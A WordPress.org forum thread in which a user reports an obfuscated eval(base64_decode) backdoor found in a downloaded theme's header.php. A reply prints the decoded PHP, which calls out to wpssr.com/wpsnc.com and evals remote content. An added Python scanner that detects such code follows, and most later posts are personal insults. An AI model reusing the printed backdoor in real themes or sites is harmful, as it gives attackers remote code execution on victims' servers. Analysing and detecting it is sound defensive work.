WordPress.org

Nasty base64 code in header.php - Can you decode (28 posts)

  1. bytesforall
    Member
    Posted 6 years ago #

    Downloaded a theme and found this in header.php. Unfortunately I briefly activated the theme on my server and I am afraid that it did something nasty there.

    <?php @eval(@base64_decode('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')); ?>

  2. RoseCitySister
    Member
    Posted 6 years ago #

    Here's what I got when I used OpinionatedGeek's decoder at http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx

    if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
        $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr";
    elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
        $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc";
    else
        $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2";
    @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;');
    if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) {
        $RD3FE9C10A808A54EA2A3DBD9E605B696 = "1";
        $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);
        $R3E33E017CD76B9B7E6C7364FB91E2E90 = @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115);
        @eval($R3E33E017CD76B9B7E6C7364FB91E2E90);
    } else {
        $RD3FE9C10A808A54EA2A3DBD9E605B696 = "0";
        $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);
        @readfile($R6E4F14B335243BE656C65E3ED9E1B115);
    }
    fclose($R37C014DAE5FE4FE5C77B6735ABC30916);
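
Added example, not part of the thread or of any poster's code: a static check that finds `eval(base64_decode('...'))` in a theme file, decodes the literal as text without running it, and lists the calls and quoted hostnames inside. The sample header and payload are constructed stand-ins, and `inspect_php`, `RISKY_CALLS` and the hostname heuristic are assumptions made for this example.

```python
import base64
import re

# eval(base64_decode('...')) with optional @ suppression, as in the posted header.php
EVAL_B64 = re.compile(
    r"""@?\s*eval\s*\(\s*@?\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""",
    re.IGNORECASE,
)
# Calls worth a closer look in a decoded payload; all four occur in the thread's code
RISKY_CALLS = ("eval", "fsockopen", "file_get_contents", "readfile")
CALL = re.compile(r"\b(" + "|".join(RISKY_CALLS) + r")\s*\(", re.IGNORECASE)
# Heuristic: quoted literals that look like a hostname or begin with a URL
HOST = re.compile(r"""["'](?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})["'/]""", re.IGNORECASE)


def inspect_php(source):
    """Decode eval(base64_decode(...)) literals as text only; nothing is executed."""
    findings = []
    for match in EVAL_B64.finditer(source):
        try:
            raw = base64.b64decode(match.group(2), validate=False)
            decoded = raw.decode("utf-8", "replace")
        except ValueError:  # malformed base64: still report the location
            decoded = ""
        findings.append({
            "line": source.count("\n", 0, match.start()) + 1,
            "calls": sorted({c.lower() for c in CALL.findall(decoded)}),
            "hosts": sorted({h.lower() for h in HOST.findall(decoded)}),
            "decoded": decoded,
        })
    return findings


# Constructed sample: a stand-in payload shaped like the one decoded in the thread
SAMPLE_PAYLOAD = (
    'if ($s = @fsockopen("www.example.com", 80, $e, $m, 3)) { '
    '@eval(@file_get_contents("http://www.example.com/w1.php")); fclose($s); }'
)
SAMPLE_HEADER = (
    "<html><head><title>blahblah</title>\n"
    "<?php @eval(@base64_decode('"
    + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
    + "')); ?>\n"
)

if __name__ == "__main__":
    for finding in inspect_php(SAMPLE_HEADER):
        print(finding["line"], finding["calls"], finding["hosts"])
```

Run it over the theme's files on disk before activation; the rendered page source will not contain any of this code.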

  3. bytesforall
    Member
    Posted 6 years ago #

    Thanks a lot. I had the same result with some online decoder and thought it wasn't fully decoded yet but it probably is?

    Looks like it's trying its own server availability and then sending the URL that the theme is running on and the surfer's IPS host name to its servers, and sending a file to the surfer?

    Can anybody shed some light on what the script is doing?

  4. whooami
    Member
    Posted 6 years ago #

  5. bytesforall
    Member
    Posted 6 years ago #

    Not sure how that answers my question whooami. Go troll in another thread

  6. whooami
    Member
    Posted 6 years ago #

    it only answers your question if you actually read whats on those links.

    how about you go take your pissy attitude back to your hole. did you really need someone to regurgitate whats available elsewhere?

    Nice that you noticed the code, props for that, but dont take your bitchiness about it out on me. I didnt put it there.

  7. Joni
    Member
    Posted 6 years ago #

    Not sure how that answers my question whooami. Go troll in another thread

    and

    Can anybody shed some light on what the script is doing?

    You clearly don't know who you're dealing with. Whoo is a security expert, you nimrod. Can't be bothered to click on a link that might not only shed light on your problem but also help PREVENT you from making the mistake that brought you here in the first place?

    Un-freaking-believable.

  8. bytesforall
    Member
    Posted 6 years ago #

    Well whooami you were snippy from the get go. I apologize for not actually reading the content of the links and for calling your post trolling but you shouldn't need to get all shook up now. I got to wpsphere through an Adsense ad on google.com an hour ago. I had to assume that their scam is fairly new or the ad wouldn't be running on #1 in adsense. I actually acted fairly knowledgeable and figured it out quick, and reported them to adsense, too. And the links you mentioned do indeed NOT explain more than I already figured out myself, the second link mentions that it could be "very, very, very dangerous".

  9. bytesforall
    Member
    Posted 6 years ago #

    Great, yet another name caller arrived.

    The links didn't contain anything that I had not figured out myself. And obviously I was the first one to actually report them. So calm down jonimueller or whoever is going to chime in next.

  10. whooami
    Member
    Posted 6 years ago #

    im by no means an expert, but gee thanks :P

  11. RoseCitySister
    Member
    Posted 6 years ago #

    You're pretty knowledgeable, certainly more so than me! (Which of course isn't saying much.)

    Curious - I just read over the GPL to find out, and I think I know the answer, but just to make sure - you can, when releasing a theme, specify that it not be modified unless

    "a) The work must carry prominent notices stating that you modified it, and giving a relevant date."

    Can you specify that the theme not be distributed, and downloaded only from a specific place?

  12. Joni
    Member
    Posted 6 years ago #

    You can try, Rose. There was an outfit here a while back, I think Matt's lawyers finally shut him down b/c he had "WordPress" in his domain name, but he was selling some prepackaged WordPress with over 100 free themes (5 of them were ours) for $197 a pop. That was pretty galling if you ask me. So you can ASK, but the Internet isn't polite society, so I wouldn't count on that stopping anyone.

  13. Joni
    Member
    Posted 6 years ago #

    @Bytes .. Well you asked "Can anybody shed some light on it?" and immediately after, you got your answer in the form of some (helpful) links. So if you already knew the answer, why the question? Oh, and sorry, but I will decide when and whether I will sit down and shut up. But thanks for trying. My husband's been at it for over 30 years and he hasn't had any more luck than you. ;)

  14. RoseCitySister
    Member
    Posted 6 years ago #

    Actually, I should have been more clear. Can you specify that the theme not be distributed, and still release it under GPL? Forgive my ignorance - I can't figure out the answer to that from the license itself.

  15. Vast HTML
    Member
    Posted 6 years ago #

    when i download a theme that has that i see if they offer a live preview. if they do then view the source of the page and grab the code you need from there and use it instead of that other code.

    Example: if the scrambled code is in the footer then go to the live preview and view source, then scroll down till you get to the footer and take the code from the view source and replace the scrambled code with it.

    P.S whooami is a butt hole to everyone, just ignore him.

  16. Lester Chan
    Member
    Posted 6 years ago #

    @erichamby whooami is a she if I am not wrong =D

  17. whooami
    Member
    Posted 6 years ago #

    no, just to you eric, you brainless girl.

    --

    you talk crap about me and dont have a clue -- just makes me laugh

    go sit on irc or s'thing, im sure your highschool buddies are waiting for you...

  18. whooami
    Member
    Posted 6 years ago #

    furthermore, back on topic, PHP is not going to be viewable in the source of any page -- encoded or not.

    Nice try eric.

  19. Vast HTML
    Member
    Posted 6 years ago #

    like you said before.. dont know much do you. not all coding is php genius. a lot of themes you download these days have the entire footer coded so you cant take out the footer links. This means divs, tables and everything. sorry but i have done this many times and it works perfect every time.

    the last theme i did this on was http://web2feel.com/2008/05/19/toughpress/ and if you download youll see the entire footer is coded. just go to the live preview and take the code you need from view source.

    and i think i know php isnt viewable in source genius

    Highschool?...... lmao

    PS, just because it has <?php @eval(@base64_decode dont mean its php in the coding

  20. whooami
    Member
    Posted 6 years ago #

    you ought to take a cue from that other thread where you so politely wrote

    "did you read.."

    this topic isnt about little spam links in the footer. its about PHP. consequently, your 'advice' is moot.

    follow?

    and just because .. doesnt matter either, as its already been decoded and thats PHP as well.

    are you following yet?

  21. Vast HTML
    Member
    Posted 6 years ago #

    like i said... Butt hole lol... and i know what the post is about. i was just giving some advice and tips... much better than what you did.

  22. whooami
    Member
    Posted 6 years ago #

    i know its tough to have your ass handed to you by a female.. and it probably really hurt your feelings to have me tell you your little web site looked like shit in firefox way back when, but why dont you get over it already? You fixed your site.. Do you really have that fragile of an ego?

    --

    you fight with yourself eric, i have much better things to do than play games with 14 year olds.

  23. Vast HTML
    Member
    Posted 6 years ago #

    that comment really made no sense. and im sorry but the way your site looked back then you had no room to talk. ooo yea may have looked ok in firefox but it looked like crap to your eyes. and a simple google search will show im much older than 14.

    "have your ass handed to you by a female" lmao yea ok .. lmao

    do i have a fragile ego... lol no... but do you really have nothing better to do?

    And while you cant see php in source code you can see the outcome of the php so by viewing source code you can see what php code is there and then make your own header.php... genius

  24. whooami
    Member
    Posted 6 years ago #

    dude, get it thru your head.. thats NOT sending output to the browser.

    dont you get that? THATS NOT HTML, THATS NOT CSS. ITS PHP

    its executing code.

    Your 'advice' is fine when youre working with something that is outputted to the browser -- the above is NOT.

    youre making yourself look really dumb arguing with me when you clearly dont understand what we are talking about.

  25. whooami
    Member
    Posted 6 years ago #

    why dont you go put up your own little webpage and paste that into it. then you can bring that page up in your little browser and marvel at the source you see.

  26. Vast HTML
    Member
    Posted 6 years ago #

    ill tell you what... give me the theme and if the theme has a live demo give me an hour and ill have a header that is not encoded and works just as it should.. then we will see who is wrong lol. and youre making yourself look dumb by saying you have better things to do than argue with me yet you keep doing it.

    heck ill do it without the live demo.... i dont really like to say im better than anyone, but ill be happy to prove im better than you anyday. of all the posts on this site 95% of the comments you leave are just crap. you leave these crap comments to try to hurt people just to make yourself feel better. so yea, ill be more than happy to show i know more than you. i say to anyone seeing this to go to your site... and then go to my many many sites and just see who they think knows more...

    im so sorry that this post turned into this fight so i wont be saying anything else in here, so please feel free to get your final words in because i wont say anything back.

    and feel free to come and bash my other post i just left here about my 2 new themes. lol not like your comments have any meaning to them

  27. whooami
    Member
    Posted 6 years ago #

    ffs, what is wrong with you? the header was fine. it was the code being executed that was the problem.

    do you NOT understand this?

    you can have a page that looks like this, call this header.php:

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"><head profile="http://gmpg.org/xfn/11">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>blahblah</title>

    and that you can put this:

    <?php mail();?>

    right after that and the output of the header will be unchanged.

    what was in the PHP above didnt affect the source of the page. Its executing code in the background.

  28. Chris_K
    Member
    Posted 6 years ago #

    Can we all be done flexing at each other now?

Topic Closed

This topic has been closed to new replies.